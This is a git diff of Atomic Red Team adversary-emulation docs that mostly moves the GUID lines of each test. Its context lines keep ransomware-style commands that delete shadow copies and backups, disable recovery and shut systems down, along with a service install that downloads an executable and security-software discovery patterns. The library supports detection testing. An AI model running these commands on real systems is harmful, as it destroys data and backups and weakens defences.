## Atomic Test #1 - Windows - Overwrite file with Sysinternals SDelete - -auto_generated_guid: 476419b5-aebf-4366-a131-ae3e8dae5fc2 - Overwrites and deletes a file using Sysinternals SDelete. Upon successful execution, "Files deleted: 1" will be displayed in the powershell session along with other information about the file that was deleted. + **Supported Platforms:** Windows +**auto_generated_guid:** 476419b5-aebf-4366-a131-ae3e8dae5fc2 + + + #### Inputs: @@ -66,14 +68,16 @@ Remove-Item $env:TEMP\SDelete.zip -Force
## Atomic Test #2 - macOS/Linux - Overwrite file with DD - -auto_generated_guid: 38deee99-fd65-4031-bec8-bfa4f9f26146 - Overwrites and deletes a file using DD. To stop the test, break the command with CTRL/CMD+C. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 38deee99-fd65-4031-bec8-bfa4f9f26146 + + + #### Inputs: diff --git a/atomics/T1486/T1486.md b/atomics/T1486/T1486.md index bad8ac5a..293063cb 100644 --- a/atomics/T1486/T1486.md +++ b/atomics/T1486/T1486.md @@ -20,13 +20,15 @@ In cloud environments, storage objects within compromised accounts may also be e
## Atomic Test #1 - Encrypt files using gpg (Linux) - -auto_generated_guid: 7b8ce084-3922-4618-8d22-95f996173765 - Uses gpg to encrypt a file + **Supported Platforms:** Linux +**auto_generated_guid:** 7b8ce084-3922-4618-8d22-95f996173765 + + + #### Inputs: @@ -70,13 +72,15 @@ which_gpg=`which gpg`
## Atomic Test #2 - Encrypt files using 7z (Linux) - -auto_generated_guid: 53e6735a-4727-44cc-b35b-237682a151ad - Uses 7z to encrypt a file + **Supported Platforms:** Linux +**auto_generated_guid:** 53e6735a-4727-44cc-b35b-237682a151ad + + + #### Inputs: @@ -120,13 +124,15 @@ which_7z=`which 7z`
## Atomic Test #3 - Encrypt files using ccrypt (Linux) - -auto_generated_guid: 08cbf59f-85da-4369-a5f4-049cffd7709f - Attempts to encrypt data on target systems as root to simulate an inturruption authentication to target system. If root permissions are not available then attempts to encrypt data within user's home directory. + **Supported Platforms:** Linux +**auto_generated_guid:** 08cbf59f-85da-4369-a5f4-049cffd7709f + + + #### Inputs: @@ -172,13 +178,15 @@ if [[ $USER == "root" ]]; then cp #{root_input_file_path} #{cped_file_path}; els
## Atomic Test #4 - Encrypt files using openssl (Linux) - -auto_generated_guid: 142752dc-ca71-443b-9359-cf6f497315f1 - Uses openssl to encrypt a file + **Supported Platforms:** Linux +**auto_generated_guid:** 142752dc-ca71-443b-9359-cf6f497315f1 + + + #### Inputs: diff --git a/atomics/T1489/T1489.md b/atomics/T1489/T1489.md index 4658beaa..a220070f 100644 --- a/atomics/T1489/T1489.md +++ b/atomics/T1489/T1489.md @@ -16,15 +16,17 @@ Adversaries may accomplish this by disabling individual services of high importa
## Atomic Test #1 - Windows - Stop service using Service Controller - -auto_generated_guid: 21dfb440-830d-4c86-a3e5-2a491d5a8d04 - Stops a specified service using the sc.exe command. Upon execution, if the spooler service was running infomration will be displayed saying it has changed to a state of STOP_PENDING. If the spooler service was not running "The service has not been started." will be displayed and it can be started by running the cleanup command. + **Supported Platforms:** Windows +**auto_generated_guid:** 21dfb440-830d-4c86-a3e5-2a491d5a8d04 + + + #### Inputs: @@ -53,15 +55,17 @@ sc.exe start #{service_name} >nul 2>&1
## Atomic Test #2 - Windows - Stop service using net.exe - -auto_generated_guid: 41274289-ec9c-4213-bea4-e43c4aa57954 - Stops a specified service using the net.exe command. Upon execution, if the service was running "The Print Spooler service was stopped successfully." will be displayed. If the service was not running, "The Print Spooler service is not started." will be displayed and it can be started by running the cleanup command. + **Supported Platforms:** Windows +**auto_generated_guid:** 41274289-ec9c-4213-bea4-e43c4aa57954 + + + #### Inputs: @@ -90,16 +94,18 @@ net.exe start #{service_name} >nul 2>&1
## Atomic Test #3 - Windows - Stop service by killing process - -auto_generated_guid: f3191b84-c38b-400b-867e-3a217a27795f - Stops a specified service killng the service's process. This technique was used by WannaCry. Upon execution, if the spoolsv service was running "SUCCESS: The process "spoolsv.exe" with PID 2316 has been terminated." will be displayed. If the service was not running "ERROR: The process "spoolsv.exe" not found." will be displayed and it can be started by running the cleanup command. + **Supported Platforms:** Windows +**auto_generated_guid:** f3191b84-c38b-400b-867e-3a217a27795f + + + #### Inputs: diff --git a/atomics/T1490/T1490.md b/atomics/T1490/T1490.md index c239f5bc..ad1339ef 100644 --- a/atomics/T1490/T1490.md +++ b/atomics/T1490/T1490.md @@ -29,18 +29,20 @@ A number of native Windows utilities have been used by adversaries to disable or
## Atomic Test #1 - Windows - Delete Volume Shadow Copies - -auto_generated_guid: 43819286-91a9-4369-90ed-d31fb4da2c01 - Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution, if no shadow volumes exist the message "No items found that satisfy the query." will be displayed. If shadow volumes are present, it will delete them without printing output to the screen. This is because the /quiet parameter was passed which also suppresses the y/n confirmation prompt. Shadow copies can only be created on Windows server or Windows 8. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc788055(v=ws.11) + **Supported Platforms:** Windows +**auto_generated_guid:** 43819286-91a9-4369-90ed-d31fb4da2c01 + + + @@ -72,14 +74,16 @@ vssadmin.exe create shadow /for=c:
## Atomic Test #2 - Windows - Delete Volume Shadow Copies via WMI - -auto_generated_guid: 6a3ff8dd-f49c-4272-a658-11c2fe58bd88 - Deletes Windows Volume Shadow Copies via WMI. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Shadow copies can only be created on Windows server or Windows 8. + **Supported Platforms:** Windows +**auto_generated_guid:** 6a3ff8dd-f49c-4272-a658-11c2fe58bd88 + + + @@ -99,14 +103,16 @@ wmic.exe shadowcopy delete
## Atomic Test #3 - Windows - wbadmin Delete Windows Backup Catalog - -auto_generated_guid: 263ba6cb-ea2b-41c9-9d4e-b652dadd002c - Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution, "The backup catalog has been successfully deleted." will be displayed in the PowerShell session. + **Supported Platforms:** Windows +**auto_generated_guid:** 263ba6cb-ea2b-41c9-9d4e-b652dadd002c + + + @@ -126,14 +132,16 @@ wbadmin delete catalog -quiet
## Atomic Test #4 - Windows - Disable Windows Recovery Console Repair - -auto_generated_guid: cf21060a-80b3-4238-a595-22525de4ab81 - Disables repair by the Windows Recovery Console on boot. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution, "The operation completed successfully." will be displayed in the powershell session. + **Supported Platforms:** Windows +**auto_generated_guid:** cf21060a-80b3-4238-a595-22525de4ab81 + + + @@ -159,16 +167,18 @@ bcdedit.exe /set {default} recoveryenabled yes >nul 2>&1
## Atomic Test #5 - Windows - Delete Volume Shadow Copies via WMI with PowerShell - -auto_generated_guid: 39a295ca-7059-4a88-86f6-09556c1211e7 - Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil. Executes Get-WMIObject. Shadow copies can only be created on Windows server or Windows 8, so upon execution there may be no output displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 39a295ca-7059-4a88-86f6-09556c1211e7 + + + @@ -188,14 +198,16 @@ Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
## Atomic Test #6 - Windows - Delete Backup Files - -auto_generated_guid: 6b1dbaf6-cc8a-4ea6-891f-6058569653bf - Deletes backup files in a manner similar to Ryuk ransomware. Upon exection, many "access is denied" messages will appear as the commands try to delete files from around the system. + **Supported Platforms:** Windows +**auto_generated_guid:** 6b1dbaf6-cc8a-4ea6-891f-6058569653bf + + + @@ -215,13 +227,15 @@ del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\back
## Atomic Test #7 - Windows - wbadmin Delete systemstatebackup - -auto_generated_guid: 584331dd-75bc-4c02-9e0b-17f5fd81c748 - Deletes the Windows systemstatebackup using wbadmin.exe. This technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled. + **Supported Platforms:** Windows +**auto_generated_guid:** 584331dd-75bc-4c02-9e0b-17f5fd81c748 + + + diff --git a/atomics/T1491.001/T1491.001.md b/atomics/T1491.001/T1491.001.md index 83a87102..805913fa 100644 --- a/atomics/T1491.001/T1491.001.md +++ b/atomics/T1491.001/T1491.001.md @@ -10,13 +10,15 @@
## Atomic Test #1 - Replace Desktop Wallpaper - -auto_generated_guid: 30558d53-9d76-41c4-9267-a7bd5184bed3 - Downloads an image from a URL and sets it as the desktop wallpaper. + **Supported Platforms:** Windows +**auto_generated_guid:** 30558d53-9d76-41c4-9267-a7bd5184bed3 + + + #### Inputs: diff --git a/atomics/T1496/T1496.md b/atomics/T1496/T1496.md index 714d567e..23067507 100644 --- a/atomics/T1496/T1496.md +++ b/atomics/T1496/T1496.md @@ -14,14 +14,16 @@ Additionally, some cryptocurrency mining malware kills off processes for competi
## Atomic Test #1 - macOS/Linux - Simulate CPU Load with Yes - -auto_generated_guid: 904a5a0e-fb02-490d-9f8d-0e256eb37549 - This test simulates a high CPU load as you might observe during cryptojacking attacks. End the test by using CTRL/CMD+C to break. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 904a5a0e-fb02-490d-9f8d-0e256eb37549 + + + diff --git a/atomics/T1497.001/T1497.001.md b/atomics/T1497.001/T1497.001.md index 86ae11ca..f7cf9555 100644 --- a/atomics/T1497.001/T1497.001.md +++ b/atomics/T1497.001/T1497.001.md @@ -22,14 +22,16 @@ Hardware checks, such as the presence of the fan, temperature, and audio devices
## Atomic Test #1 - Detect Virtualization Environment (Linux) - -auto_generated_guid: dfbd1a21-540d-4574-9731-e852bd6fe840 - systemd-detect-virt detects execution in a virtualized environment. At boot, dmesg stores a log if a hypervisor is detected. + **Supported Platforms:** Linux +**auto_generated_guid:** dfbd1a21-540d-4574-9731-e852bd6fe840 + + + @@ -49,13 +51,15 @@ if (systemd-detect-virt || sudo dmidecode | egrep -i 'manufacturer|product|vendo
## Atomic Test #2 - Detect Virtualization Environment (Windows) - -auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d - Windows Management Instrumentation(WMI) objects contains system information which helps to detect virtualization. This command will specifically attempt to get the CurrentTemperature value from this object and will check to see if the attempt results in an error that contains the word supported. This is meant to find the result of Not supported, which is the result if run in a virtual machine + **Supported Platforms:** Windows +**auto_generated_guid:** 502a7dc4-9d6f-4d28-abf2-f0e84692562d + + + @@ -81,13 +85,15 @@ $error.clear()
## Atomic Test #3 - Detect Virtualization Environment (MacOS) - -auto_generated_guid: a960185f-aef6-4547-8350-d1ce16680d09 - ioreg contains registry entries for all the device drivers in the system. If it's a virtual machine, one of the device manufacturer will be a Virtualization Software. + **Supported Platforms:** macOS +**auto_generated_guid:** a960185f-aef6-4547-8350-d1ce16680d09 + + + diff --git a/atomics/T1505.002/T1505.002.md b/atomics/T1505.002/T1505.002.md index 7e3386e2..e5ad87a3 100644 --- a/atomics/T1505.002/T1505.002.md +++ b/atomics/T1505.002/T1505.002.md @@ -12,14 +12,16 @@ Adversaries may register a malicious transport agent to provide a persistence me
## Atomic Test #1 - Install MS Exchange Transport Agent Persistence - -auto_generated_guid: 43e92449-ff60-46e9-83a3-1a38089df94d - Install a Microsoft Exchange Transport Agent for persistence. This requires execution from an Exchange Client Access Server and the creation of a DLL with specific exports. Seen in use by Turla. More details- https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help + **Supported Platforms:** Windows +**auto_generated_guid:** 43e92449-ff60-46e9-83a3-1a38089df94d + + + #### Inputs: diff --git a/atomics/T1505.003/T1505.003.md b/atomics/T1505.003/T1505.003.md index 1a3d7bbd..83933c8d 100644 --- a/atomics/T1505.003/T1505.003.md +++ b/atomics/T1505.003/T1505.003.md @@ -12,15 +12,17 @@ In addition to a server-side script, a Web shell may have a client interface pro
## Atomic Test #1 - Web Shell Written to Disk - -auto_generated_guid: 0a2ce662-1efa-496f-a472-2fe7b080db16 - This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. Idea from APTSimulator. cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx + **Supported Platforms:** Windows +**auto_generated_guid:** 0a2ce662-1efa-496f-a472-2fe7b080db16 + + + #### Inputs: diff --git a/atomics/T1518.001/T1518.001.md b/atomics/T1518.001/T1518.001.md index 230fdbef..97c326fc 100644 --- a/atomics/T1518.001/T1518.001.md +++ b/atomics/T1518.001/T1518.001.md @@ -24,16 +24,18 @@ Adversaries may also utilize cloud APIs to discover the configurations of firewa
## Atomic Test #1 - Security Software Discovery - -auto_generated_guid: f92a380f-ced9-491f-b338-95a991418ce2 - Methods to identify Security Software on an endpoint when sucessfully executed, the test is going to display running processes, firewall configuration on network profiles and specific security software. + **Supported Platforms:** Windows +**auto_generated_guid:** f92a380f-ced9-491f-b338-95a991418ce2 + + + @@ -58,15 +60,17 @@ tasklist.exe | findstr /i cylance
## Atomic Test #2 - Security Software Discovery - powershell - -auto_generated_guid: 7f566051-f033-49fb-89de-b6bacab730f0 - Methods to identify Security Software on an endpoint when sucessfully executed, powershell is going to processes related AV products if they are running. + **Supported Platforms:** Windows +**auto_generated_guid:** 7f566051-f033-49fb-89de-b6bacab730f0 + + + @@ -89,14 +93,16 @@ get-process | ?{$_.Description -like "*cylance*"}
## Atomic Test #3 - Security Software Discovery - ps (macOS) - -auto_generated_guid: ba62ce11-e820-485f-9c17-6f3c857cd840 - Methods to identify Security Software on an endpoint when sucessfully executed, command shell is going to display AV/Security software it is running. + **Supported Platforms:** macOS +**auto_generated_guid:** ba62ce11-e820-485f-9c17-6f3c857cd840 + + + @@ -116,14 +122,16 @@ ps aux | egrep 'Little\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefen
## Atomic Test #4 - Security Software Discovery - ps (Linux) - -auto_generated_guid: 23b91cd2-c99c-4002-9e41-317c63e024a2 - Methods to identify Security Software on an endpoint when sucessfully executed, command shell is going to display AV/Security software it is running. + **Supported Platforms:** Linux +**auto_generated_guid:** 23b91cd2-c99c-4002-9e41-317c63e024a2 + + + @@ -143,15 +151,17 @@ ps aux | egrep 'falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|
## Atomic Test #5 - Security Software Discovery - Sysmon Service - -auto_generated_guid: fe613cf3-8009-4446-9a0f-bc78a15b66c9 - Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed). when sucessfully executed, the test is going to display sysmon driver instance if it is installed. + **Supported Platforms:** Windows +**auto_generated_guid:** fe613cf3-8009-4446-9a0f-bc78a15b66c9 + + + @@ -171,15 +181,17 @@ fltmc.exe | findstr.exe 385201
## Atomic Test #6 - Security Software Discovery - AV Discovery via WMI - -auto_generated_guid: 1553252f-14ea-4d3b-8a08-d7a4211aa945 - Discovery of installed antivirus products via a WMI query. when sucessfully executed, the test is going to display installed AV software. + **Supported Platforms:** Windows +**auto_generated_guid:** 1553252f-14ea-4d3b-8a08-d7a4211aa945 + + + diff --git a/atomics/T1518/T1518.md b/atomics/T1518/T1518.md index 3dbb4789..796e4ffc 100644 --- a/atomics/T1518/T1518.md +++ b/atomics/T1518/T1518.md @@ -16,14 +16,16 @@ Adversaries may attempt to enumerate software for a variety of reasons, such as
## Atomic Test #1 - Find and Display Internet Explorer Browser Version - -auto_generated_guid: 68981660-6670-47ee-a5fa-7e74806420a4 - Query the registry to determine the version of internet explorer installed on the system. Upon execution, version information about internet explorer will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 68981660-6670-47ee-a5fa-7e74806420a4 + + + @@ -43,14 +45,16 @@ reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersio
## Atomic Test #2 - Applications Installed - -auto_generated_guid: c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b - Query the registry to determine software and versions installed on the system. Upon execution a table of software name and version information will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b + + + @@ -71,13 +75,15 @@ Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uni
## Atomic Test #3 - Find and Display Safari Browser Version - -auto_generated_guid: 103d6533-fd2a-4d08-976a-4a598565280f - Adversaries may attempt to get a listing of non-security related software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors + **Supported Platforms:** macOS +**auto_generated_guid:** 103d6533-fd2a-4d08-976a-4a598565280f + + + diff --git a/atomics/T1529/T1529.md b/atomics/T1529/T1529.md index 1a223ec8..13cf9b66 100644 --- a/atomics/T1529/T1529.md +++ b/atomics/T1529/T1529.md @@ -28,13 +28,15 @@ Adversaries may attempt to shutdown/reboot a system after impacting it in other
## Atomic Test #1 - Shutdown System - Windows - -auto_generated_guid: ad254fa8-45c0-403b-8c77-e00b3d3e7a64 - This test shuts down a Windows system. + **Supported Platforms:** Windows +**auto_generated_guid:** ad254fa8-45c0-403b-8c77-e00b3d3e7a64 + + + #### Inputs: @@ -59,13 +61,15 @@ shutdown /s /t #{timeout}
## Atomic Test #2 - Restart System - Windows - -auto_generated_guid: f4648f0d-bf78-483c-bafc-3ec99cd1c302 - This test restarts a Windows system. + **Supported Platforms:** Windows +**auto_generated_guid:** f4648f0d-bf78-483c-bafc-3ec99cd1c302 + + + #### Inputs: @@ -90,13 +94,15 @@ shutdown /r /t #{timeout}
## Atomic Test #3 - Restart System via `shutdown` - macOS/Linux - -auto_generated_guid: 6326dbc4-444b-4c04-88f4-27e94d0327cb - This test restarts a macOS/Linux system. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 6326dbc4-444b-4c04-88f4-27e94d0327cb + + + #### Inputs: @@ -121,13 +127,15 @@ shutdown -r #{timeout}
## Atomic Test #4 - Shutdown System via `shutdown` - macOS/Linux - -auto_generated_guid: 4963a81e-a3ad-4f02-adda-812343b351de - This test shuts down a macOS/Linux system using a halt. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 4963a81e-a3ad-4f02-adda-812343b351de + + + #### Inputs: @@ -152,13 +160,15 @@ shutdown -h #{timeout}
## Atomic Test #5 - Restart System via `reboot` - macOS/Linux - -auto_generated_guid: 47d0b042-a918-40ab-8cf9-150ffe919027 - This test restarts a macOS/Linux system via `reboot`. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 47d0b042-a918-40ab-8cf9-150ffe919027 + + + @@ -178,13 +188,15 @@ reboot
## Atomic Test #6 - Shutdown System via `halt` - Linux - -auto_generated_guid: 918f70ab-e1ef-49ff-bc57-b27021df84dd - This test shuts down a Linux system using `halt`. + **Supported Platforms:** Linux +**auto_generated_guid:** 918f70ab-e1ef-49ff-bc57-b27021df84dd + + + @@ -204,13 +216,15 @@ halt -p
## Atomic Test #7 - Reboot System via `halt` - Linux - -auto_generated_guid: 78f92e14-f1e9-4446-b3e9-f1b921f2459e - This test restarts a Linux system using `halt`. + **Supported Platforms:** Linux +**auto_generated_guid:** 78f92e14-f1e9-4446-b3e9-f1b921f2459e + + + @@ -230,13 +244,15 @@ halt --reboot
## Atomic Test #8 - Shutdown System via `poweroff` - Linux - -auto_generated_guid: 73a90cd2-48a2-4ac5-8594-2af35fa909fa - This test shuts down a Linux system using `poweroff`. + **Supported Platforms:** Linux +**auto_generated_guid:** 73a90cd2-48a2-4ac5-8594-2af35fa909fa + + + @@ -256,13 +272,15 @@ poweroff
## Atomic Test #9 - Reboot System via `poweroff` - Linux - -auto_generated_guid: 61303105-ff60-427b-999e-efb90b314e41 - This test restarts a Linux system using `poweroff`. + **Supported Platforms:** Linux +**auto_generated_guid:** 61303105-ff60-427b-999e-efb90b314e41 + + + diff --git a/atomics/T1531/T1531.md b/atomics/T1531/T1531.md index a5dba7da..0e5483e1 100644 --- a/atomics/T1531/T1531.md +++ b/atomics/T1531/T1531.md @@ -16,14 +16,16 @@ Adversaries may also subsequently log off and/or reboot boxes to set malicious c
## Atomic Test #1 - Change User Password - Windows - -auto_generated_guid: 1b99ef28-f83c-4ec5-8a08-1a56263a5bb2 - Changes the user password to hinder access attempts. Seen in use by LockerGoga. Upon execution, log into the user account "AtomicAdministrator" with the password "HuHuHUHoHo283283". + **Supported Platforms:** Windows +**auto_generated_guid:** 1b99ef28-f83c-4ec5-8a08-1a56263a5bb2 + + + #### Inputs: @@ -55,13 +57,15 @@ net.exe user #{user_account} /delete >nul 2>&1
## Atomic Test #2 - Delete User - Windows - -auto_generated_guid: f21a1d7d-a62f-442a-8c3a-2440d43b19e5 - Deletes a user account to prevent access. Upon execution, run the command "net user" to verify that the new "AtomicUser" account was deleted. + **Supported Platforms:** Windows +**auto_generated_guid:** f21a1d7d-a62f-442a-8c3a-2440d43b19e5 + + + #### Inputs: @@ -88,13 +92,15 @@ net.exe user #{user_account} /delete
## Atomic Test #3 - Remove Account From Domain Admin Group - -auto_generated_guid: 43f71395-6c37-498e-ab17-897d814a0947 - This test will remove an account from the domain admins group + **Supported Platforms:** Windows +**auto_generated_guid:** 43f71395-6c37-498e-ab17-897d814a0947 + + + #### Inputs: diff --git a/atomics/T1543.001/T1543.001.md b/atomics/T1543.001/T1543.001.md index 33f7a5b3..5f572f48 100644 --- a/atomics/T1543.001/T1543.001.md +++ b/atomics/T1543.001/T1543.001.md @@ -12,13 +12,15 @@ Adversaries may install a new launch agent that can be configured to execute at
## Atomic Test #1 - Launch Agent - -auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 - Create a plist and execute it + **Supported Platforms:** macOS +**auto_generated_guid:** a5983dee-bf6c-4eaf-951c-dbc1a7b90900 + + + #### Inputs: diff --git a/atomics/T1543.002/T1543.002.md b/atomics/T1543.002/T1543.002.md index cbb857ac..7e10bdf0 100644 --- a/atomics/T1543.002/T1543.002.md +++ b/atomics/T1543.002/T1543.002.md @@ -22,13 +22,15 @@ While adversaries typically require root privileges to create/modify service uni
## Atomic Test #1 - Create Systemd Service - -auto_generated_guid: d9e4f24f-aa67-4c6e-bcbf-85622b697a7c - This test creates a Systemd service unit file and enables it as a service. + **Supported Platforms:** Linux +**auto_generated_guid:** d9e4f24f-aa67-4c6e-bcbf-85622b697a7c + + + #### Inputs: @@ -83,13 +85,15 @@ systemctl daemon-reload
## Atomic Test #2 - Create Systemd Service file, Enable the service , Modify and Reload the service. - -auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89 - This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process. + **Supported Platforms:** Linux +**auto_generated_guid:** c35ac4a8-19de-43af-b9f8-755da7e89c89 + + + diff --git a/atomics/T1543.003/T1543.003.md b/atomics/T1543.003/T1543.003.md index 616ccbd2..7044982f 100644 --- a/atomics/T1543.003/T1543.003.md +++ b/atomics/T1543.003/T1543.003.md @@ -20,15 +20,17 @@ Services may be created with administrator privileges but are executed under SYS
## Atomic Test #1 - Modify Fax service to run PowerShell - -auto_generated_guid: ed366cde-7d12-49df-a833-671904770b9f - This test will temporarily modify the service Fax by changing the binPath to PowerShell and will then revert the binPath change, restoring Fax to its original state. Upon successful execution, cmd will modify the binpath for `Fax` to spawn powershell. Powershell will then spawn. + **Supported Platforms:** Windows +**auto_generated_guid:** ed366cde-7d12-49df-a833-671904770b9f + + + @@ -53,14 +55,16 @@ sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" >nul 2>&1
## Atomic Test #2 - Service Installation CMD - -auto_generated_guid: 981e2942-e433-44e9-afc1-8c957a1496b6 - Download an executable from github and start it as a service. Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 981e2942-e433-44e9-afc1-8c957a1496b6 + + + #### Inputs: @@ -105,14 +109,16 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #3 - Service Installation PowerShell - -auto_generated_guid: 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 - Installs A Local Service via PowerShell. Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 + + + #### Inputs: diff --git a/atomics/T1543.004/T1543.004.md b/atomics/T1543.004/T1543.004.md index c8f5977d..d3aaeda3 100644 --- a/atomics/T1543.004/T1543.004.md +++ b/atomics/T1543.004/T1543.004.md @@ -14,13 +14,15 @@ The plist file permissions must be root:wheel, but the script or program that it
## Atomic Test #1 - Launch Daemon - -auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf - Utilize LaunchDaemon to launch `Hello World` + **Supported Platforms:** macOS +**auto_generated_guid:** 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf + + + #### Inputs: diff --git a/atomics/T1546.001/T1546.001.md b/atomics/T1546.001/T1546.001.md index 41cc789d..afb4141e 100644 --- a/atomics/T1546.001/T1546.001.md +++ b/atomics/T1546.001/T1546.001.md @@ -17,15 +17,17 @@ The values of the keys listed are commands that are executed when the handler op
## Atomic Test #1 - Change Default File Association - -auto_generated_guid: 10a08978-2045-4d62-8c42-1957bbbea102 - Change Default File Association From cmd.exe of hta to notepad. Upon successful execution, cmd.exe will change the file association of .hta to notepad.exe. + **Supported Platforms:** Windows +**auto_generated_guid:** 10a08978-2045-4d62-8c42-1957bbbea102 + + + #### Inputs: diff --git a/atomics/T1546.002/T1546.002.md b/atomics/T1546.002/T1546.002.md index 6b340f80..4e2640aa 100644 --- a/atomics/T1546.002/T1546.002.md +++ b/atomics/T1546.002/T1546.002.md @@ -19,13 +19,15 @@ Adversaries can use screensaver settings to maintain persistence by setting the
## Atomic Test #1 - Set Arbitrary Binary as Screensaver - -auto_generated_guid: 281201e7-de41-4dc9-b73d-f288938cbb64 - This test copies a binary into the Windows System32 folder and sets it as the screensaver so it will execute for persistence. Requires a reboot and logon. + **Supported Platforms:** Windows +**auto_generated_guid:** 281201e7-de41-4dc9-b73d-f288938cbb64 + + + #### Inputs: diff --git a/atomics/T1546.003/T1546.003.md b/atomics/T1546.003/T1546.003.md index f94ca7be..7bf968e5 100644 --- a/atomics/T1546.003/T1546.003.md +++ b/atomics/T1546.003/T1546.003.md @@ -14,9 +14,6 @@ WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe
## Atomic Test #1 - Persistence via WMI Event Subscription - -auto_generated_guid: 3c64f177-28e2-49eb-a799-d767b24dd1e0 - Run from an administrator powershell window. After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. @@ -25,9 +22,14 @@ Code references https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545 + **Supported Platforms:** Windows +**auto_generated_guid:** 3c64f177-28e2-49eb-a799-d767b24dd1e0 + + + diff --git a/atomics/T1546.004/T1546.004.md b/atomics/T1546.004/T1546.004.md index 29f7920d..4299c29d 100644 --- a/atomics/T1546.004/T1546.004.md +++ b/atomics/T1546.004/T1546.004.md @@ -16,13 +16,15 @@ For macOS, the functionality of this technique is similar but may leverage zsh,
## Atomic Test #1 - Add command to .bash_profile - -auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f - Adds a command to the .bash_profile file of the current user + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 94500ae1-7e31-47e3-886b-c328da46872f + + + #### Inputs: @@ -47,13 +49,15 @@ echo "#{command_to_add}" >> ~/.bash_profile
## Atomic Test #2 - Add command to .bashrc - -auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f - Adds a command to the .bashrc file of the current user + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 0a898315-4cfa-4007-bafe-33a4646d115f + + + #### Inputs: diff --git a/atomics/T1546.005/T1546.005.md b/atomics/T1546.005/T1546.005.md index 7c2f996c..8520cfbd 100644 --- a/atomics/T1546.005/T1546.005.md +++ b/atomics/T1546.005/T1546.005.md @@ -12,14 +12,16 @@ Adversaries can use this to register code to be executed when the shell encounte
## Atomic Test #1 - Trap - -auto_generated_guid: a74b2e07-5952-4c03-8b56-56274b076b61 - After exiting the shell, the script will download and execute. After sending a keyboard interrupt (CTRL+C) the script will download and execute. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** a74b2e07-5952-4c03-8b56-56274b076b61 + + + diff --git a/atomics/T1546.007/T1546.007.md b/atomics/T1546.007/T1546.007.md index 374d1c09..04622979 100644 --- a/atomics/T1546.007/T1546.007.md +++ b/atomics/T1546.007/T1546.007.md @@ -12,13 +12,15 @@ Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code
## Atomic Test #1 - Netsh Helper DLL Registration - -auto_generated_guid: 3244697d-5a3a-4dfc-941c-550f69f91a4d - Netsh interacts with other operating system components using dynamic-link library (DLL) files + **Supported Platforms:** Windows +**auto_generated_guid:** 3244697d-5a3a-4dfc-941c-550f69f91a4d + + + #### Inputs: diff --git a/atomics/T1546.008/T1546.008.md b/atomics/T1546.008/T1546.008.md index 69ed5766..735d996a 100644 --- a/atomics/T1546.008/T1546.008.md +++ b/atomics/T1546.008/T1546.008.md @@ -26,15 +26,17 @@ Other accessibility features exist that may also be leveraged in a similar fashi
